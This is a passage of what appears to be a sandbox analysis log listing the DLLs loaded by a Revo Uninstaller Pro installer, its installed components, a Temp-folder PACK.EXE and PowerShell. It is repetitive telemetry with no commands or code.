      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\runonce.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\grpconv.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\grpconv.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\regsvr32.exeSection loaded: msi.dllJump to behavior
      Source: C:\Windows\System32\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\regsvr32.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msi.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: oledlg.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: rstrtmgr.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: version.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: riched32.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: version.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: olepro32.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wsock32.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msi.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: oledlg.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: rstrtmgr.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: version.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: winsta.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: riched32.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: <pi-ms-win-core-synch-l1-2-0.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: <pi-ms-win-core-synch-l1-2-0.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: <pi-ms-win-core-localization-l1-2-1.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: version.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: dxgidebug.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: sfc_os.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: rsaenh.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: dwmapi.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: cryptbase.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: riched20.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: usp10.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: msls31.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: dpapi.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: textshaping.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: textinputframework.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: coreuicomponents.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: coremessaging.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: ntmarta.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: coremessaging.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: wintypes.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: propsys.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: profapi.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: edputil.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: urlmon.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: iertutil.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: srvcli.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: netutils.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: windows.staterepositoryps.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: appresolver.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: bcp47langs.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: slc.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: userenv.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: sppc.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: onecorecommonproxystub.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: pcacli.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: windows.fileexplorer.common.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: ntshrui.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: cscapi.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: linkinfo.dll
      Source: C:\Users\user\AppData\Local\Temp\PACK.EXESection loaded: msasn1.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: version.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: mpr.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: olepro32.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wininet.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wsock32.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winmm.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: iphlpapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: iphlpapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: mpr.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: oleacc.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: usp10.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: uxtheme.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: kernel.appcore.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wtsapi32.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winsta.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: sxs.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: textshaping.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: textinputframework.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: coreuicomponents.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: coremessaging.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: ntmarta.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: coremessaging.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wintypes.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wintypes.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wintypes.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: dwmapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wbemcomn.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: napinsp.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: pnrpnsp.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wshbth.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: nlaapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: mswsock.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: dnsapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winrnr.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: fwpuclnt.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: rasadhlp.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: amsi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: userenv.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: profapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: napinsp.dll
